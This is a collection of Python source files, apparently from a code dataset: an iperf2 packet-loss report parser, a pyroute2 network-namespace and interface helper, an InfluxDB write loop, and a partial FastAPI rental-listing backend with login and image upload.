result = self._info_regex.match(line) # check if it's an info header
if result:
info_data = result.groupdict()
stream_id = info_data["stream_id"]
if (
stream_id not in self._results
): # new stream id detected -> create new result structure
self._results[stream_id] = {
"summary": {},
"detail": [],
"info": result.groupdict(),
"events": [],
"timestamp": timestamp,
}
self.currently_has_loss[stream_id] = False
result = self._result_regex.match(line) # check if it's a report line
if result:
report_data = result.groupdict()
stream_id = report_data["stream_id"]
interval_begin = Decimal(report_data["interval_begin"])
interval_end = Decimal(report_data["interval_end"])
if "packets_lost" in report_data:
is_receiver = True
packets_lost = int(report_data["packets_lost"])
packets_received = int(report_data["packets_received"])
else:
is_sender = True
try: # check if we have a predecessor result
last_interval_begin = Decimal(
self._results[stream_id]["detail"][-1]["interval_begin"]
)
except IndexError:
last_interval_begin = -1
if (
last_interval_begin > interval_begin
): # if it's a summary store it and return
self._results[stream_id]["summary"] = result.groupdict()
self._log.debug("got summary result")
return True # suppress any message for summary
if is_receiver:
report_message = copy.copy(report_data)
report_message["stream_name"] = self.name
if packets_received < self.expected_interval_packets:
probably_packets_lost = (
self.expected_interval_packets - packets_received
)
# print('probably lost {0}'.format(probably_packets_lost))
if (
probably_packets_lost > 4
): # ignore minimal loss because it could also be a timing issue
report_message["packets_lost"] = probably_packets_lost
report_message[
"packets_received"
] = self.expected_interval_packets
packets_lost = probably_packets_lost
packets_received = self.expected_interval_packets
# print('{0} {1}'.format(packets_lost, packets_received))
if (
packets_lost > self.expected_interval_packets + 4
): # handle summary packet loss message
# pprint( self._results[stream_id]['events'])
try:
packets_lost = (
packets_lost
- self._results[stream_id]["events"][-1][
"total_packets_lost_since_event_start"
]
)
packets_received = self.expected_interval_packets - packets_lost
report_message["packets_lost"] = packets_lost
report_message["packets_received"] = packets_received
# print('{0} {1}'.format(packets_lost,packets_received))
except IndexError: # loss without event registred, can only be at interval_begin 0.0 -> ignore
# print('----------------------index error------------------------')
if interval_begin == 0:
report_message["packets_lost"] = 0
report_message[
"packets_received"
] = self.expected_interval_packets
else:
self._log.debug(pformat(self._results))
self._log.debug(pformat(report_message))
self._log.debug(line)
raise Exception("Something went wrong")
packet_loss_event_message = {
"event_number": self._current_event_number,
"stream_id": str(stream_id),
"stream_name": self.name,
"status": "",
"total_packets_lost_since_event_start": 0,
"packets_lost": packets_lost,
"packets_received": packets_received,
"event_begin": interval_begin,
"event_end": None,
"timestamp_start": timestamp,
"timestamp_current": timestamp,
"timestamp_end": None,
}
if packets_received == 0: # handle 100% packet loss situation
report_message["packets_lost"] = self.expected_interval_packets
packets_lost = self.expected_interval_packets
if self.currently_has_loss[stream_id]:
self._log.debug(
"losing all packets, receiving nothing, should receive {} (cont.)".format(
self.bandwidth
)
)
self._results[stream_id]["events"][-1][
"total_packets_lost_since_event_start"
] += packets_lost
self._results[stream_id]["events"][-1][
"timestamp_current"
] = timestamp
self._results[stream_id]["events"][-1][
"packets_lost"
] = packets_lost
self._results[stream_id]["events"][-1][
"status"
] = "losing all packets (cont.)"
self._results[stream_id]["events"][-1][
"packets_received"
] = packets_received
packet_loss_event_message = copy.copy(
self._results[stream_id]["events"][-1]
)
else:
self._log.debug(
"losing all packets, receiving nothing, should receive {}".format(
self.bandwidth
)
)
self._current_event_number += 1
packet_loss_event_message[
"event_number"
] = self._current_event_number
packet_loss_event_message[
"packets_lost"
] = (
self.expected_interval_packets
) # set lost packets to pps because iperf reports 0 lost which breaks graph
packet_loss_event_message[
"total_packets_lost_since_event_start"
] = packets_lost
packet_loss_event_message["status"] = "losing all packets"
packet_loss_event_message["packets_received"] = packets_received
self._results[stream_id]["events"].append(
packet_loss_event_message
)
self.currently_has_loss[stream_id] = True
elif packets_lost > 0: # handle packet loss situation
if self.currently_has_loss[
stream_id
]: # handle ongoing packet loss situation
self._log.debug("ongoing packet loss detected")
self._results[stream_id]["events"][-1][
"total_packets_lost_since_event_start"
] += packets_lost
self._results[stream_id]["events"][-1][
"timestamp_current"
] = timestamp
self._results[stream_id]["events"][-1][
"status"
] = "losing packets (cont.)"
self._results[stream_id]["events"][-1][
"packets_lost"
] = packets_lost
self._results[stream_id]["events"][-1][
"packets_received"
] = packets_received
packet_loss_event_message = copy.copy(
self._results[stream_id]["events"][-1]
)
else: # handle new packet loss situation
self._log.debug("begin of packet loss detected")
self.currently_has_loss[stream_id] = True
self._current_event_number += 1
packet_loss_event_message[
"event_number"
] = self._current_event_number
packet_loss_event_message["status"] = "losing packets"
packet_loss_event_message[
"total_packets_lost_since_event_start"
] = packets_lost
self._results[stream_id]["events"].append(
packet_loss_event_message
)
elif self.currently_has_loss[stream_id]: # handle end of loss situation
self._log.debug("end of packet loss detected")
self.currently_has_loss[stream_id] = False
self._results[stream_id]["events"][-1][
"timestamp_current"
] = timestamp
self._results[stream_id]["events"][-1]["timestamp_end"] = timestamp
self._results[stream_id]["events"][-1][
"interval_end"
] = interval_end
self._results[stream_id]["events"][-1]["status"] = "stable"
self._results[stream_id]["events"][-1][
"packets_lost"
] = packets_lost
self._results[stream_id]["events"][-1][
"packets_received"
] = packets_received
packet_loss_event_message = copy.copy(
self._results[stream_id]["events"][-1]
)
else: # do not send loss event in case of no loss
packet_loss_event_message = False
else:
self._log.debug("cannot parse report line: {0}".format(line))
if packet_loss_event_message:
# print(packet_loss_event_message)
# self._results[stream_id]['events'].append(packet_loss_event_message)
for callback, args in self._on_packetloss_callbacks:
callback(packet_loss_event_message, **args)
if report_message:
self._results[stream_id]["detail"].append(report_message)
for callback, args in self._on_data_callbacks:
callback(report_message, **args)
    def get_result_events(self, data):
        # 'data' is a list of per-interval report dicts, e.g. one stream's
        # "detail" list taken from get_results()
        results_with_packet_loss = pyjq.all('.[] | select(.packets_lost!="0")', data)
events = []
event_data = []
event_begin = None
event_loss = 0
for idx, result in enumerate(results_with_packet_loss):
event_data.append(result)
event_loss += int(result["packets_lost"])
if not event_begin:
event_begin = Decimal(result["interval_begin"])
try:
if (
result["interval_end"]
!= results_with_packet_loss[idx + 1]["interval_begin"]
):
events.append(
{
"detail": event_data,
"summary": {
"total_loss": event_loss,
"begin": str(event_begin),
"end": str(Decimal(result["interval_end"])),
"duration": str(
Decimal(result["interval_end"]) - event_begin
),
"packet_rate": "{0[packet_rate]} {0[packet_rate_unit]}".format(
result
),
},
}
)
event_data = []
event_loss = 0
event_begin = None
except IndexError:
events.append(
{
"detail": event_data,
"summary": {
"total_loss": event_loss,
"begin": str(event_begin),
"end": str(Decimal(result["interval_end"])),
"duration": str(
Decimal(result["interval_end"]) - event_begin
),
"packet_rate": "{0[packet_rate]} {0[packet_rate_unit]}".format(
result
),
},
}
)
return events
def register_on_data_callback(self, cb, **kwargs):
self._on_data_callbacks.append((cb, kwargs))
def register_on_packtetloss_callback(self, cb, **kwargs):
self._on_packetloss_callbacks.append((cb, kwargs))
@property
def get_name(self):
if not self.name:
raise ValueError("iperf instance needs a name")
return self.name
def output_reader(self):
for line in iter(self._proc.stdout.readline, b""):
self._outq.put(line.decode("utf-8"))
def set_options(self, **kwargs):
for option_name, option_value in kwargs.items():
self.__setattr__(option_name, str(option_value))
if "pps" in self.bandwidth:
self.expected_interval_packets = int(
Decimal(self.report_interval) * Decimal(self.bandwidth[:-3])
)
else:
self.expected_interval_packets = None
def get_options(self):
retval = {}
for k, v in self.__dict__.items():
if not k.startswith("_"):
retval[k] = v
return retval
def generate_cli_from_options(self):
_cli = []
if self.use_linux_namespace:
_cli.extend("ip netns exec {0}".format(self.use_linux_namespace).split(" "))
_cli.append(self.iperf_binary_path)
_cli.append("-e")
_cli.append("-t")
_cli.append(self.test_duration)
if self.type == "server":
_cli.append("-s")
if self.bind_ip:
_cli.append("-B")
_cli.append(self.bind_ip)
if self.protocol == "udp":
# multicast server result
# [ 4] 2.6000-2.7000 sec 0.00 Bytes 0.00 bits/sec 0.000 ms 0/ 0 (0%) -/-/-/- ms 0 pps
# [ 3] 8.7000-8.8000 sec 144 KBytes 11.8 Mbits/sec 0.002 ms 0/ 100 (0%) 0.015/ 0.008/ 0.037/ 0.006 ms 1000 pps 100753.94
self._result_regex = re.compile(
r"^\[\s*(?P<stream_id>\d+)\]\s+(?P<interval_begin>\d+\.\d+)-(?P<interval_end>\d+\.\d+)\s+(?P<interval_unit>\S+)\s+(?P<received>\S+)\s+(?P<received_unit>\S+)\s+(?P<bandwidth>\S+)\s+(?P<bandwidth_unit>\S+)\s+(?P<jitter>\S+)\s+(?P<jitter_unit>\S+)\s+(?P<packets_lost>\S+)/\s*(?P<packets_received>\S+)\s+\(.*\)\s+(?P<latency_avg>\S+)\s*/\s*(?P<latency_min>\S+)\s*/\s*(?P<latency_max>\S+)\s*/\s*(?P<latency_stdev>\S+)\s+(?P<latency_unit>\S+)\s+(?P<packet_rate>\d+)\s+(?P<packet_rate_unit>\S+)\s*(?P<net_pwr>\S+)?"
)
elif self.type == "client":
_cli.append("-c")
if not self.server_ip:
raise ValueError("Client needs server_ip to be set")
_cli.append(self.server_ip)
if self.bind_ip and self.client_source_port:
_cli.append("-B")
_cli.append("{0}:{1}".format(self.bind_ip, self.client_source_port))
if self.protocol == "udp":
# [ 3] local 192.168.51.154 port 54877 connected with 172.16.58.3 port 5001
self._result_regex = re.compile(
r"^\[\s*(?P<stream_id>\d+)\]\s+(?P<interval_begin>\d+\.\d+)-(?P<interval_end>\d+\.\d+)\s+(?P<interval_unit>\S+)\s+(?P<transferred>\S+)\s+(?P<transferred_unit>\S+)\s+(?P<bandwidth>\S+)\s+(?P<bandwidth_unit>\S+)\s+(?P<packets_written>\S+)/(?P<packets_error>\S+)\s+(?P<packet_rate>\d+)\s+(?P<packet_rate_unit>\S+)"
)
else:
raise ValueError("type must be set to either server or client")
if self.protocol == "udp":
_cli.append("-u")
self._info_regex = re.compile(
r"^\[\s*(?P<stream_id>\d+)\]\s+local\s+(?P<local_ip>\S+)\s+port\s+(?P<local_port>\S+)\s+connected\s+with\s+(?P<remote_ip>\S+)\s+port\s+(?P<remote_port>\S+)"
)
#
if self.realtime:
_cli.append("-z")
_cli.append("-i")
_cli.append(self.report_interval)
_cli.append("-b")
_cli.append(self.bandwidth)
_cli.append("-p")
_cli.append(self.port)
return _cli
def start(self, create_thread_function=threading.Thread):
self._results = {}
if self._cleanup_timer_thread:
self._cleanup_timer_thread.join()
del self._cleanup_timer_thread
self._cleanup_timer_thread = None
# print(' '.join(self.generate_cli_from_options()))
self._proc = subprocess.Popen(
self.generate_cli_from_options(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
if not self._output_reader_thread:
self._output_reader_thread = create_thread_function(
target=output_reader, args=(self._proc, self._outq, self)
)
self._output_reader_thread.start()
self._running = True
self.status = "running"
time.sleep(0.2)
self._cleanup_timer_thread = threading.Timer(
int(self.test_duration) + 10, self.stop
)
self._cleanup_timer_thread.start()
if self._proc.poll() is not None:
self.stop()
return False
return True
def stop(self):
if self._running:
self._proc.terminate()
self._proc.wait()
del self._proc
self._proc = None
self._output_reader_thread.join()
del self._output_reader_thread
self._output_reader_thread = None
self._running = False
self.status = "stopped"
if self._raw_log_filehandler:
self._raw_log_filehandler.close()
return True
def get_results(self):
return self._results
class Server(IPerfInstance):
def __init__(self):
super(Server, self).__init__()
self.type = "server"
class Client(IPerfInstance):
def __init__(self, server_ip=None):
super(Client, self).__init__()
self.type = "client"
``` |
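A minimal usage sketch for the classes above, assuming the module is importable as `pyperf2` and an iperf2 binary exists at the default `/usr/bin/iperf`; the callback, names, addresses and durations are illustrative only:
```python
from pyperf2 import Server

def print_report(report, **kwargs):
    # called once per report interval with the parsed report fields
    print(report["stream_name"], report.get("packets_received"))

server = Server()
server.set_options(
    name="rx1",
    protocol="udp",
    bind_ip="127.0.0.1",
    port="5001",
    report_interval="1",
    bandwidth="1000pps",
    test_duration="10",
)
server.register_on_data_callback(print_report)

if server.start():
    # ... run a matching pyperf2 Client (or plain iperf -c) against
    # 127.0.0.1:5001 here, then collect results ...
    server.stop()
    print(server.get_results())
```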
{
"source": "jinjamator/simplenetlink",
"score": 3
} |
#### File: simplenetlink/simplenetlink/__init__.py
```python
from pyroute2 import IPRoute, netns, NetNS, netlink
import socket
import logging
import time
class SimpleNetlink(object):
def __init__(self, namespace=None):
self.ipr = IPRoute()
self._log = logging.getLogger("SimpleNetlink")
self._current_namespace = namespace
self._previous_namespace_instance = None
self._previous_namespace = None
# self._log.level = logging.DEBUG
self._supported_virtual_interface_types = ["ipvlan", "tagged"]
def get_interface_index(self, ifname):
res = self.ipr.link_lookup(ifname=ifname)
if len(res) == 1:
return res[0]
else:
if len(res) == 0:
raise ValueError(
f"no result found for {ifname} in namespace {self.get_current_namespace_name()}"
)
else:
self._log.error(
f"multiple results found for {ifname}: {res} -> returning first"
)
return res[0]
def create_namespace(self, namespace):
ns = netns.create(namespace)
self.set_current_namespace(namespace)
idx = self.get_interface_index("lo")
self.ipr.link("set", index=idx, state="up")
self.restore_previous_namespace()
def set_current_namespace(self, namespace):
if not namespace:
if self._current_namespace:
self._log.info(f"close {self._current_namespace}")
self.ipr.close()
self._previous_namespace = self._current_namespace
self.ipr = IPRoute()
self._current_namespace = namespace
elif namespace not in self.get_namespaces():
self._log.debug(
f"{namespace} does not exist, implicitly creating namespace {namespace}"
)
self.create_namespace(namespace)
if namespace:
self._previous_namespace = self._current_namespace
if self.ipr:
self.ipr.close()
self.ipr = NetNS(namespace)
self._current_namespace = namespace
self._log.debug(
f"switched namespace from {self._previous_namespace} to {self._current_namespace}"
)
return True
def restore_previous_namespace(self):
tmp_i = self.ipr
tmp = self._current_namespace
self.ipr = self._previous_namespace_instance
self._current_namespace = self._previous_namespace
self._previous_namespace_instance = tmp_i
self._previous_namespace = tmp
self._log.debug(f"restored previous namespace {self._current_namespace}")
return True
def delete_namespace(self, namespace):
if namespace in self.get_namespaces():
ns = NetNS(namespace)
ns.close()
ns.remove()
self._log.debug(f"removed namespace {namespace}")
if namespace == self._current_namespace:
self.set_current_namespace(None)
time.sleep(
0.1
) # give kernel some time, this workarounds various 'already existing' problams
else:
self._log.debug(
f"cannot remove non existing namespace {namespace} -> ignoring request"
)
def get_current_namespace_name(self):
return self._current_namespace
def get_namespaces(self):
return list(netns.listnetns())
def find_interface_in_all_namespaces(self, interface_name):
idx = None
namespace = self.get_current_namespace_name()
try:
self.set_current_namespace(None)
idx = self.get_interface_index(interface_name)
namespace = self.get_current_namespace_name()
self.restore_previous_namespace()
except ValueError:
for namespace in self.get_namespaces():
self._log.debug(f"switching namespace to {namespace}")
self.set_current_namespace(namespace)
try:
idx = self.get_interface_index(interface_name)
break
except:
pass
self.restore_previous_namespace()
if idx:
self._log.debug(
f"found interface {interface_name} in namespace {namespace} with index {idx}"
)
else:
self._log.debug(f"cannot find interface {interface_name} in any namespace")
return (namespace, idx)
def __create_tagged(self, interface_name, **kwargs):
if kwargs.get("parent_interface"):
(base_namespace, base_idx) = self.find_interface_in_all_namespaces(
kwargs.get("parent_interface")
)
self._log.debug(
f"found parent_interface {kwargs.get('parent_interface')} in namespace {base_namespace}"
)
if not kwargs.get("vlan_id"):
raise ValueError(
"vlan_id not specified -> cannot create tagged vlan interface without"
)
else:
self._log.debug(
f"creating tagged interface {interface_name} with tag on base_interface"
)
self.set_current_namespace(base_namespace)
self.ipr.link(
"add",
ifname=interface_name,
kind="vlan",
link=base_idx,
vlan_id=int(kwargs.get("vlan_id")),
)
idx = self.get_interface_index(interface_name)
namespace = kwargs.get("namespace")
if namespace:
if kwargs.get("namespace") not in self.get_namespaces():
self.create_namespace(namespace)
self.ipr.link("set", index=idx, net_ns_fd=namespace)
self.set_current_namespace(namespace)
idx = self.get_interface_index(interface_name)
else:
self.ipr.link("set", index=idx, net_ns_pid=1)
return (namespace, idx)
else:
raise ValueError(
f"parent_interface not specified for vlan interface {interface_name}"
)
def __create_ipvlan(self, interface_name, **kwargs):
ipvlan_modes = {
"l2": 0,
"l3": 1,
"l3s": 2,
}
if kwargs.get("parent_interface"):
(base_namespace, base_idx) = self.find_interface_in_all_namespaces(
kwargs.get("parent_interface")
)
self._log.debug(f"found parent_interface in namespace {base_namespace}")
self.set_current_namespace(base_namespace)
self.ipr.link(
"add",
ifname=interface_name,
kind="ipvlan",
link=base_idx,
ipvlan_mode=ipvlan_modes[
"l2"
], # l2 mode so arp can be handled from namespace
)
idx = self.get_interface_index(interface_name)
namespace = kwargs.get("namespace")
if namespace:
self.set_current_namespace(namespace)
self.set_current_namespace(base_namespace)
self.ipr.link("set", index=idx, net_ns_fd=kwargs.get("namespace"))
self.set_current_namespace(namespace)
else:
self.ipr.link("set", index=idx, net_ns_pid=1)
self.set_current_namespace(None)
idx = self.get_interface_index(interface_name)
return (namespace, idx)
else:
raise ValueError(
f"parent_interface not specified for ipvlan interface {interface_name}"
)
def create_interface(self, interface_name, **kwargs):
        f = getattr(self, f"_SimpleNetlink__create_{kwargs.get('type')}", None)
if f:
(namespace, idx) = f(interface_name, **kwargs)
if kwargs.get("link_state", "").lower() == "down":
self.ipr.link("set", index=idx, state="down")
else:
self._log.debug(
f"enabling interface {interface_name} in namespace {namespace}"
)
self.ipr.link("set", index=idx, state="up")
return (namespace, idx)
else:
raise ValueError(f"type {kwargs.get('type')} not implemented")
def ensure_interface_exists(self, interface, **kwargs):
namespace, idx = self.find_interface_in_all_namespaces(interface)
if idx:
if kwargs.get("namespace") != namespace:
self._log.debug(
f'interface is in namespace {namespace} -> moving to {kwargs.get("namespace")}'
)
if kwargs.get("namespace"):
self.set_current_namespace(kwargs.get("namespace"))
self.set_current_namespace(namespace)
self.ipr.link("set", index=idx, net_ns_fd=kwargs.get("namespace"))
self.set_current_namespace(kwargs.get("namespace"))
self.interface_up(interface)
else:
self.set_current_namespace(namespace)
self.ipr.link("set", index=idx, net_ns_pid=1)
self.set_current_namespace(None)
self.interface_up(interface)
else:
if kwargs.get("type") in self._supported_virtual_interface_types:
self._log.debug(
f'interface type of {interface} is virtual interface of type {kwargs.get("type")} which does not exist -> creating'
)
namespace, idx = self.create_interface(interface, **kwargs)
else:
raise ValueError(
f"either physical interface just doesn't exist (typo?) or virtual type {kwargs.get('type')} is not supported"
)
for ipv4_config_item in kwargs.get("ipv4", []):
self.interface_add_ipv4(interface, ipv4_config_item)
return (namespace, idx)
def interface_add_ipv4(self, interface_name, prefix):
idx = self.get_interface_index(interface_name)
if not idx:
raise ValueError(
f"interface {interface_name} not found in namespace {self._current_namespace}"
)
address, prefix_len = prefix.strip().split("/")
prefix_len = int(prefix_len)
try:
self.ipr.addr("add", index=idx, address=address, prefixlen=prefix_len)
except netlink.exceptions.NetlinkError as e:
if e.code == 98 or e.code == 17:
self._log.debug(
f"prefix {prefix} already in use in namespace {self._current_namespace} -> ignoring request"
)
self._log.debug(e)
return True
else:
raise (e)
self._log.debug(
f"setting ipv4_address {prefix} on {interface_name} in namespace {self._current_namespace}"
)
return True
def interface_delete_ipv4(self, interface_name, prefix):
idx = self.get_interface_index(interface_name)
if not idx:
raise ValueError(
f"interface {interface_name} not found in namespace {self._current_namespace}"
)
address, prefix_len = prefix.strip().split("/")
prefix_len = int(prefix_len)
try:
self.ipr.addr("del", index=idx, address=address, prefixlen=prefix_len)
except netlink.exceptions.NetlinkError as e:
if e.code == 98 or e.code == 17:
self._log.debug(
f"prefix {prefix} already in use in namespace {self._current_namespace} -> ignoring request"
)
self._log.debug(e)
return True
else:
raise (e)
self._log.debug(
f"setting ipv4_address {prefix} on {interface_name} in namespace {self._current_namespace}"
)
return True
    def interface_up(self, interface_name):
idx = self.get_interface_index(interface_name)
if not idx:
raise ValueError(
f"interface {interface_name} not found in namespace {self._current_namespace}"
)
self.ipr.link("set", index=idx, state="up")
    def interface_down(self, interface_name):
idx = self.get_interface_index(interface_name)
if not idx:
raise ValueError(
f"interface {interface_name} not found in namespace {self._current_namespace}"
)
self.ipr.link("set", index=idx, state="down")
def get_routes(self):
retval = {
'static':{},
'dynamic':{},
'local':{}
}
for route in self.ipr.route("show", type=1):
if route.get_attr('RTA_GATEWAY'):
dest = route.get_attr('RTA_DST')
if dest:
dest=f"{dest}/{route.get('dst_len')}"
else:
dest='default'
if dest not in retval['static']:
retval['static'][dest]=[]
retval['static'][dest].append(route.get_attr('RTA_GATEWAY'))
elif route.get_attr('RTA_PREFSRC'):
dest = f"{route.get_attr('RTA_DST')}/{route.get('dst_len')}"
if dest not in retval['local']:
retval['local'][dest]=[]
retval['local'][dest].append(f"{route.get_attr('RTA_PREFSRC')}")
else:
                raise ValueError(f'Should never get here; if we do, something is really wrong: {route}')
return retval
def add_route(self, prefix, nexthop):
try:
self.ipr.route("add", gateway=nexthop, dst=prefix)
self._log.debug(
f"added route {prefix} via {nexthop} in namespace {self._current_namespace}"
)
except netlink.exceptions.NetlinkError as e:
if e.code == 17:
self._log.debug(
f"route {prefix} via {nexthop} in namespace {self._current_namespace} exists -> ignoring"
)
pass
else:
raise (e)
def delete_route(self, prefix, nexthop):
try:
self.ipr.route("del", gateway=nexthop, dst=prefix)
except netlink.exceptions.NetlinkError as e:
if e.code == 3:
self._log.debug(
f"route {prefix} via {nexthop} in namespace {self._current_namespace} does not exist -> ignoring request to delete"
)
else:
raise (e)
def get_network_interfaces_info(self):
results = {}
for link in self.ipr.get_links():
ipv4 = []
ipv6 = []
for addr in self.ipr.get_addr(
family=socket.AF_INET, label=link.get_attr("IFLA_IFNAME")
):
ipv4.append(
{
"prefix_length": addr["prefixlen"],
"address": addr.get_attr("IFA_ADDRESS"),
}
)
for addr in self.ipr.get_addr(
family=socket.AF_INET6, label=link.get_attr("IFLA_IFNAME")
):
ipv6.append(
{
"prefix_length": addr["prefixlen"],
"address": addr.get_attr("IFA_ADDRESS"),
}
)
results[link.get_attr("IFLA_IFNAME")] = {
"link_state": link["state"].lower(),
"oper_state": link.get_attr("IFLA_OPERSTATE").lower(),
"mac_address": link.get_attr("IFLA_ADDRESS", "None").lower(),
"mtu": link.get_attr("IFLA_MTU"),
"ipv4": ipv4,
"ipv6": ipv6,
}
return results
``` |
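A minimal usage sketch for `SimpleNetlink`, assuming it runs as root on Linux with pyroute2 installed and that a physical interface named `eth0` exists; the interface, namespace and address values are illustrative only:
```python
from simplenetlink import SimpleNetlink

snl = SimpleNetlink()

# create (or reuse) an ipvlan interface on top of eth0 inside namespace "tenant1"
# and assign an address; the namespace is created implicitly if missing
snl.ensure_interface_exists(
    "ipvlan0",
    type="ipvlan",
    parent_interface="eth0",
    namespace="tenant1",
    ipv4=["192.0.2.10/24"],
)

# the instance is now operating inside namespace "tenant1"
snl.add_route("198.51.100.0/24", "192.0.2.1")
print(snl.get_network_interfaces_info())
```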
{
"source": "jinjd/k8sdemo-master",
"score": 3
} |
#### File: single-mid/influxdb/influxdb_test.py
```python
from influxdb import InfluxDBClient
from datetime import datetime
import time
client = InfluxDBClient(host='influxdb.default', port=8086, database='pods')
def write_to_influx(data):
now = datetime.utcnow().isoformat() + 'Z'
json_body = [
{
"measurement": "pod_shutdown_data",
"tags": {
},
"time": str(now),
"fields": data
}
]
try:
client.create_database('pods')
client.write_points(json_body)
#sanitycheck
result = client.query('select * from pod_shutdown_data;')
print('result',str(result))
except Exception as e:
print('error',str(e))
i = 1
while True:
i += 1
data = {
'somekey':i
}
write_to_influx(data)
time.sleep(5)
``` |
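A small companion sketch that reads the points written by the script above back out of the same `pods` database (assumes the same InfluxDB host and measurement name):
```python
from influxdb import InfluxDBClient

client = InfluxDBClient(host='influxdb.default', port=8086, database='pods')

# fetch points written in the last hour and print the 'somekey' field
result = client.query('SELECT * FROM pod_shutdown_data WHERE time > now() - 1h;')
for point in result.get_points():
    print(point['time'], point.get('somekey'))
```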
{
"source": "jinjf553/hook_up_rent",
"score": 2
} |
#### File: hook_up_rent/backend/main.py
```python
import time
from datetime import timedelta
from random import choice
from typing import List, Optional
from fastapi import Depends, FastAPI, File, UploadFile
from fastapi.staticfiles import StaticFiles
from passlib.context import CryptContext
from pydantic import BaseModel
from sqlalchemy.orm import Session
from config import ACCESS_TOKEN_EXPIRE_MINUTES, HEADERS, STATIC_DIR
from orm import DBSession, DBUser
from utils import create_access_token, get_current_user
app = FastAPI()
''' Run with: uvicorn main:app --reload --host 0.0.0.0 --port 8000 '''
app.mount("/static", StaticFiles(directory=STATIC_DIR), name="static")
class User(BaseModel):
# id: int
username: str
    password: str
status: Optional[int] = 0
description: Optional[str] = ''
body: Optional[dict] = {'token': ''}
class Config:
orm_mode = True
class Houses(BaseModel):
title: str
description: str
price: str
size: str
oriented: str
roomType: str
floor: str
community: str
houseImg: str
supporting: str
class Config:
orm_mode = True
@app.get("/")
def read_root():
return {"Hello": "World"}
@app.post("/user/registered", response_model=User)
async def user_register(user: User, db: Session = Depends(DBSession)):
    # hash the password with bcrypt
password = CryptContext(schemes=["bcrypt"],
deprecated="auto").hash(user.password)
db_user = DBUser(username=user.username, password=password)
DBUser.add(db, db_user)
    db_user.status, db_user.description = 200, '注册成功!'
return db_user
@app.post("/user/login", response_model=User)
async def register(user: User, db: Session = Depends(DBSession)):
db_user = DBUser.get_by_username(db, user.username)
    # bcrypt context used to verify the submitted password
verify = CryptContext(schemes=["bcrypt"], deprecated="auto")
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(
data={"sub": user.username}, expires_delta=access_token_expires
)
if not db_user:
db_user = User(username='', password='')
db_user.status = 300
db_user.description = '用户不存在!'
return db_user
elif not verify.verify(user.password, db_user.password):
db_user.status = 300
db_user.description = '你的账号或密码错误!'
return db_user
else:
db_user.status, db_user.description = 200, '账号登录成功!'
db_user.body['token'] = access_token
print(db_user.status)
return db_user
@app.get("/user", response_model=User)
async def read_users_me(username: User = Depends(get_current_user), db: Session = Depends(DBSession)):
print('login_username: ', username, time.strftime('%M%S'))
db_user: User = DBUser.get_by_username(db, username)
if not db_user or not username:
db_user = User(username='', password='', status=400, description='登录信息失效,请重新登录!')
return db_user
db_user.description, db_user.status = '成功', 200
if 'token' in db_user.body:
db_user.body.pop('token')
db_user.body.update({'avatar': choice(HEADERS),
'nickname': f'好客_{str(db_user.id).rjust(6, "0")}',
'gender': choice(['男', '女']),
'phone': '小米', 'id': db_user.id})
return db_user
@app.get("/houses/condition")
async def get_houses_condition(id: str, db: Session = Depends(DBSession)):
response_json = {'status': 200, 'description': '请求成功', 'body': {
'area': {'label': '区域', 'value': 'area', 'children': [{'label': '不限', 'value': 'null'}, {'label': '朝阳', 'value': 'AREA|zhaoyang'}]},
'characteristic': [{'label': '集中供暖', 'value': 'CHAR|jizhonggongnuan'}],
'floor': [{'label': '高楼层', 'value': 'FLOOR|1'}],
'rentType': [{'label': '不限', 'value': 'null'}],
'oriented': [{'label': '东', 'value': 'ORIEN|1'}],
'price': [{'label': '不限', 'value': 'null'}],
'roomType': [{'label': '一室', 'value': 'ROOM|1'}],
'subway': {'label': '地铁', 'value': 'subway', 'children': [{'label': '不限', 'value': 'null'}]}
}}
if id == 'AREA|1111':
return response_json
else:
response_json['body']['area']['children'] = [{'label': '不限', 'value': 'null'}, {'label': '宝山', 'value': 'AREA|baoshan'}]
return response_json
@app.get("/houses")
async def get_houses(cityId, area, mode, price, more, start, end, db: Session = Depends(DBSession)):
response_json = {'status': 200, 'description': '请求成功', 'body': {
'list': [{'houseCode': '11', 'title': '线上', 'desc': 'subtitle', 'houseImg': 'static/images/轮播1.jpg', 'tags': ['近地铁'], 'price': 2000}]
}}
if area == 'AREA|zhaoyang':
return response_json
else:
response_json['body']['list'][0]['title'] = '线下'
return response_json
@app.get("/houses/params")
async def get_houses_params():
response_json = {'status': 200, 'description': '请求成功', 'body': {
'floor': [{'value': '1', 'label': '高楼层'}, {'value': '2', 'label': '中楼层'}, {'value': '3', 'label': '低楼层'}],
'roomType': [{'value': '1', 'label': '一室'}, {'value': '2', 'label': '二室'}, {'value': '3', 'label': '三室'}, {'value': '4', 'label': '四室'}],
'oriented': [{'value': '1', 'label': '东'}, {'value': '2', 'label': '南'}, {'value': '3', 'label': '西'}, {'value': '4', 'label': '北'}]}}
return response_json
@app.post("/house/image")
async def post_houses_image(file: List[UploadFile] = File(...), username: User = Depends(get_current_user)):
response_json = {'status': 200, 'description': '请求成功', 'body': []}
for x in file:
with open(f'{STATIC_DIR}/{x.filename}', 'wb') as f:
f.write(await x.read())
response_json['body'].append(x.filename)
return response_json
@app.get("/houses/{roomId}")
async def get_houses_room(roomId: int, db: Session = Depends(DBSession)):
response_json = {'status': 200,
'description': '请求成功',
'body': {'houseCode': '1111',
'title': '整租 中山路 历史最低点',
'community': '中山花园',
'description':
'近地铁,附近有商场!254对数据集跑一下第二版仿真工程。 -- 3月7号demo版本2. 五个城市五个机型对应的TOP5数据标注2.0 (北京只有一条) deviceId的数量大于203. 不care城市五个机型对应的TOP数据标注2.0( 2和3的deviceId不能重复 ) # 先不做254对数据集跑一下第二版仿真工程。 -- 3月7号demo版本2. 五个城市五个机型对应的TOP5数据标注2.0 (北京只有一条) deviceId的数量大于203. 不care城市五个机型对应的TOP数据标注2.0( 2和3的deviceId不能重复 ) # 先不做254对数据集跑一下第二版仿真工程。 -- 3月7号demo版本2. 五个城市五个机型对应的TOP5数据标注2.0 (北京只有一条) deviceId的数量大于203. 不care城市五个机型对应的TOP数据标注2.0( 2和3的deviceId不能重复 ) # 先不做',
'size': 100,
'floor': '高楼层',
'price': 3000,
'oriented': ['南'],
'roomType': '三室',
'supporting': ['衣柜', '洗衣机'],
'tags': ['近地铁', '集中供暖', '新上', '随时看房'],
'houseImg': [
'static/images/轮播1.jpg',
'static/images/轮播2.jpg',
'static/images/轮播3.jpg'
]}}
return response_json
@app.get("/user/houses")
async def get_user_houses(username: User = Depends(get_current_user), db: Session = Depends(DBSession)):
